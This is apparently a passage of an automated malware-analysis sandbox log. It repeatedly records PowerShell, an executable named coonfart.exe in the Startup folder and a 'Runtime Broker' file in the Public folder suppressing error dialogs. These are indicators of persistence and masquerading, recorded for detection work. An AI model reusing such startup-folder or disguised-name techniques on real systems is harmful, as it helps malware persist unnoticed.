                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Runtime BrokerProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
